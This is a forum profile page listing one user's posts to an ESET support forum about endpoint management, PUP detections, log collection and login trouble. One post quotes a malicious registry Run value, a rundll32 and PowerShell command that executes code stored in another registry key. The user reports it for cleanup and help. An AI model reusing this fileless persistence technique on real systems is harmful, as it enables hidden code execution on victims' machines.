Jump to content

Carl S

Members
  • Posts

    61
  • Joined

  • Last visited

Everything posted by Carl S

  1. Re: 3, I don't have the management agent installed on that computer yet. Do I need to install that first? Seems like just to see it in the list I wouldn't have to do that. I saw all my other items like network printers, and bridge routers as "Rogue" at first. Seems like it should at least find it even if it isn't in there. But regardless, I should just go to the server itself and install the management software it should make it start showing up? Ours is supposed to be "Advanced" so, I think it's supposed to include the server(s).
  2. Absolutely. For now, I'm holding off on any more changes until Marcos posts again to the thread. One of my main concerns was that the logs said ESET was cleaning by deleting repeatedly over several days, but clearly it was either not deleting or something was putting it back. For now, though, it's gone 16 hours or so without being re-detected and it is still not in the registry since manually removing it yesterday.
  3. We have EES installed on all the client desktop machines, but also have servers running. Read this: https://support.eset.com/en/kb2299-which-eset-security-solution-should-i-install-on-a-server 1) One server has Exchange on it, but it is not our primary Exchange (which we have moved to Office 365 in the cloud), but our old Exchange which we have no new mail coming in, but occasionally need to connect to because it does have some old emails we need to retrieve on occasion for legacy reasons. It also has a SQL server instance on it. Is the Mail Security for Exchange Server the option still? 2) The other server has IIS and acts as a file server. I am assuming the ESET File Security for Windows Server is appropriate for it. That is the machine I currently have ESMC installed. 3) I do not see the first server in the list of computers in ESMC. So, I tried to manually add it by clicking Add New at the bottom of the computer listing in ESMC, I get the message: Some issues occurred during adding computers. FAIL> XXXXX.XX.local (Duplicity on server)
  4. Hi Marcos, here is attachment. I removed the value of the authHost line. But other than that, everything else is the same. FWIW, I have no new detections since the 4th. 10485-baker01-ees_logs.zip
  5. I was thinking that myself, even though I'm not all that familiar with the registry, it was clear the powershell string was pointing to that other registry item.
  6. Marcos, I re-ran the collector on a whim, and this time, it worked. I now have the zip file ready.
  7. Am I deleting the whole key / value pair or the value and leaving the key?
  8. Hmm. I get a message from the Log Collector that says "An error occurred during collection of files. See the log for more info."
  9. Working on this. I killed off the ESET agent accidentally, while trying to uninstall the competitor's product that wasn't successfully uninstalled before installing the ESET agent. Now up and running again, and will get the logs. (Ok, it's collecting right now) It's been years since I've submitted these type of logs, so remind me, do I attach them to the post, or send them in some other way? Seems like they may have some confidential stuff.
  10. The suspicious part seems to be: key: authHost value: rundll32 shell32.dll,ShellExec_RunDLL "cmd" /c start /min powershell iex([System.Text.Encoding]::ASCII.GetString((Get-ItemProperty 'HKCU:\Software\AppDataLow\Software\Microsoft\D4062752-23C4-26DB-4D48-07BAD1FC2B8E').Auxibrkr))
  11. OK, found it by navigating to it. Could not get search to work. In the meantime, I have ESET client issues on that machine, probably due to my own fault.
  12. Duh, didn't catch that, I just cut and pasted. Thanks.
  13. When I search for that key I don't find it in regedit.
  14. This keeps showing up in one of our client machines in registry with the Registry scanner Detection engine 20939 (20200303) : Hash 8ECE3FFE602D59D1E38F9506F5DA1FC280AADAF8 \REGISTRY\USER\S-1-5-21-3146671537-2346468688-2395455220-1182\Software\Microsoft\Windows\CurrentVersion\Run the ESMC says that it was "cleaned by deleting," but then it shows up a few hours later. Is there some way to identify a process that is reinserting this? Or what else should I do next?
  15. After fifteen years of using various versions of ESET NOD32 on my home computers and small offices, I have been trying to use it to replace our previous solution at the office. Today, after having a computer that got rolled back before the install of ESET endpoint client on 2/27 due to becoming unresponsive, I now see that client computer twice in the list with two different names. Not totally sure which is the new one and which is the old instance. I decided what needs to happen is that one of them needs to be removed from the ESMC. Is that right? In the ESMC, when I click on it and choose delete, it tells me there are three steps that must be completed. 1) Reset Endpoint Settings. 2) Stop computer management. 3) Remove computer from database. Since I didn't do 1 and 2 before reverting it, what should I do? If I send the instructions to the phantom one, will it affect the new one with the same IP but slightly different name? None of these instructions seem to really make sense in light of the situation I find myself in. I realize I might have done this differently, but I wasn't thinking of the impact this might have had on ESET when I was rolling it back.
  16. No, no other web sites have this problem, only this forum, but I tried it with multiple browsers and computers, all had the same problem. I have since changed authorization to use Facebook to login. I don't have this problem with it, (although I really didn't want to connect using Facebook.) It was only when using email and password that I have the problem. Before using the Facebook login, I was having to reset my password each time I returned to the Eset forum site.
  17. As an FYI, the online cybersecurity training that comes with ESS has a link to a page called "Take away PDF of tips and tricks." If you click on that link, it opens a pop-up window in the browser, but the server responds with error 404. The missing file is https://www.eset.com/us/resources/netropolis/embeds/ESETCybersecurityEducationTips.pdf
  18. Yes, if you read my post to itman, you'll see that as part of the debugging of version 9, which was having problems starting the EGUI both from the start menu as well as displaying ESS in the system tray, I had added EGUI to the start menu. After upgrading to version 10, this addition remained. I had added by putting shortcut to EGUI.exe in the folder C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup While that didn't work for version 9--about 2/3 of the time I could not get to the GUI--once I had upgraded to 10, I was now getting the UI to pop up every time. I had forgotten that this was something we'd tried under version 9. When I removed it from that startup directory yesterday, the problem was resolved.
  19. Nope, but that got me thinking! If you'll look at my original post, one of the problems I had previously was that the ESET icon was not starting at all and not appearing in the system tray. I have a vague recollection that one of the things attempted to get it to go was adding it manually to one of the autostart places on the computer. That didn't work, though. Now, I'm thinking I never removed that and the startup is because I moved on to another strategy to get it to work.Eventually, moving to 10 seemed to get it to work. Now, I think I'm just seeing the results of my attempts to get version 9 to start at all. Sure enough I do Run|shell:startup and I see a shortcut to EGUI.exe dated 9/1/2016 from the height of my ESS 9 problems. Yep, that seems to be it. It was something leftover from earlier troubleshooting on version 9.
  20. Yes, I reinstalled version 10, it grabbed 10.0.390.0 during install, and after installing and rebooting, the ESET GUI stays open on logging in.
  21. KingSoft.D is the signature name by which ESET labels the unwanted program. It is the unique identifier that goes along with the definition in the ESET database that is used to name the PUP. The file in question is either the WPS Office installer or one of the files inside it or that it retrieves from the web during the installation process. Without further details, it's hard to tell exactly what file that is, and it may not be important. If the software is not working correctly, you might try installing and clicking Ignore instead of Clean if you're sure you really want WPS Office. You can probably see why it is considered a PUP at 1:18 in your video. At that point it is going out to a possibly shady ad-server on the web when you start the Office program. You can see this WPS Office is advertising supported (see the ad in the spreadsheet for WebStorm). That's why it's considered a PUP. It is getting advertising from the web, probably without fully warning the user before installation that it would be doing that. If you're OK with that type of behavior, just ignore the Win32/KingSoft.D PUP warnings during the installation. The URL warnings near the end of your video are a bit more problematic. It appears it is getting javascript from 1-1ads.com to load up ads in the software. Either that javascript is malicious or URL/domain have been identified as a problem. You can ignore them by whitelisting, but without further details, that would be a tough call for the user. My thought is if WPS Office works as expected, would be to let ESET block the URLs. You might want to turn off the notifications, though as that might get annoying. There is an option in the settings called "Display only notifications requiring user interaction." That would let ESET silently block those URLs. If, however, WPS Office stops working as expected, then you may need to whitelist things so the software can work correctly, but I would not recommend that unless you're absolutely clear as to why ESET is blocking the ad URLs. You can ignore PUPs if you're personally OK with that. Ignore other ESET warnings at your own peril.
  22. Well, it's doing exactly what it's supposed to be doing. ESET is warning about files that may be "harmless" because you have PUP detection turned on. If you don't want it to be so aggressive and that ESET's being too cautious, you can turn PUP detection off. Or, you can temporarily turn off ESET's detection while you install the software, and turn it back on later. It is clear that software from Kingsoft has been determined to be a Potentially Unwanted Program by ESET and/or some of its users. Otherwise, they wouldn't have named the detection after the software publisher itself. This doesn't mean it is a virus or trojan. It means that it does something else that many users don't like. It doesn't make sense for ESET to ignore this software for everyone, when you're the one who has determined this particular PUP is OK for you. I understand that. In the past, I have installed software that included adware, but I thought it was worth it to get the free software. I ignored ESET's PUP warning and still used the software. I do not expect ESET to remove that particular PUP detection for that item for everyone else, because for many it is indeed an unwanted program.
  23. Since it's called Kingsoft.D, I suspect that's not a false positive, but a PUP that was specifically found in WPS Office. If you don't like it, turn off PUP detection.
  24. I'm finding that the last few times I have tried to log in the forum does not recognize my password. I am forced to reset my password every time. I change it, save it locally on my computer, and the next time I try to log into the forum, it says it is wrong. I am cutting and pasting, so I know it is right. I have tried multiple browsers with the same result. Anyone else experiencing this? I've resorted to just resetting my password each time I return here.
×
×
  • Create New...